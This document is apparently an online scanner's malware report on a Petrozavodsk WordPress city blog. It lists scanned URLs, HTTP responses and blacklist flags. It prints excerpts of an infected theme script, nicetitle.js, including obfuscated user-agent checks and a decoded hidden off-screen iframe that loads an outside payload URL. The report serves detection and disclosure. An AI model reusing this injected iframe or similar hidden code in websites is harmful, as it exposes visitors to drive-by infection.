Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ptz-blog.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ptz-blog.ru/ | 200 OK Content-Length: 66971 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zagga.in <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Городской блог Петрозаводска</title> <meta name="generator" content="WordPress 3 ...[4322 bytes skipped]... | ||
http://www.ptz-blog.ru//letcaro.com/js/couter.js?ver=1.038/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 30 Jan 2015 17:34:35 GMT Pragma: no-cache Location: http://www.ptz-blog.ru/letcaro.com/js/couter.js?ver=1.038/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Cache: MISS from t7.ht-systems.ru X-Cache-Lookup: MISS from t7.ht-systems.ru:6666 X-Pingback: http://www.ptz-blog.ru/xmlrpc.php | clean |
http://www.ptz-blog.ru/letcaro.com/js/couter.js?ver=1.038/ | 404 Not Found Content-Length: 25531 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zagga.in <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Page not found » Городской блог Петрозаводска</title> <meta name="gene ...[4347 bytes skipped]... | ||
http://www.ptz-blog.ru/wp-content/themes/falling_dreams/nicetitle.js | 200 OK Content-Length: 7334 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var carpet = (g_haystack + '').toLowerCase(); var fulisca = (g_needle + '').toLowerCase(); var index = 0; if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; } return false; } function CheckBrowser(){ var badbrowserlist = ['Chrome','Android']; var anuchbrow = false; for (var i in badbrowserlist) { if (stripos(navigator.userAgent, this.version = parseFloat(ua.substr(i + s.length)); return; } s = "Netscape6/"; if ((i = ua.indexOf(s)) >= 0) { this.isNS = true; this.version = parseFloat(ua.substr(i + s.length)); return; } s = "Gecko"; if ((i = ua.indexOf(s)) >= 0) { this.isNS = true; this.version = 6.1; return; } } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: function makeNiceTitles() { if (!document.createElement || !document.getElementsByTagName) { return; } if (!document.createElementNS) { document.createElementNS = function (ns, elt) {return document.createElement(elt);}; } if (!document.links) { document.links = document.getElementsByTagName("a"); } for (var ti = 0; ti < document.links.length; ti++) { var lnk = document.links[ti]; addEvent(instag, "mouseover", showNiceTitle); addEvent(instag, "mouseout", hideNiceTitle); addEvent(instag, "focus", showNiceTitle); addEvent(instag, "blur", hideNiceTitle); } } } } <iframe src="http://dokisjam.tdl-informatica.com.ar/cracker15.ficvali" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe> Antivirus reports:
| ||
http://letcaro.com/js/couter.js?ver=1.036.002 | 200 OK Content-Length: 4760 Content-Type: application/javascript | clean |
http://karelia.info/counter/topscript?site=2426&type=12 | 404 Not Found Content-Length: 564 Content-Type: text/html | clean |
http://karelia.info/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Fri, 30 Jan 2015 17:34:37 GMT Location: http://list.karelia.info//test404page.js Server: nginx Content-Length: 178 Content-Type: text/html | clean |
http://list.karelia.info//test404page.js/ | 404 Not Found Content-Length: 213 Content-Type: text/html | clean |
http://list.karelia.info/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ptz-blog.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ptz-blog.ru
Referer: http://www.google.com/search?q=ptz-blog.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.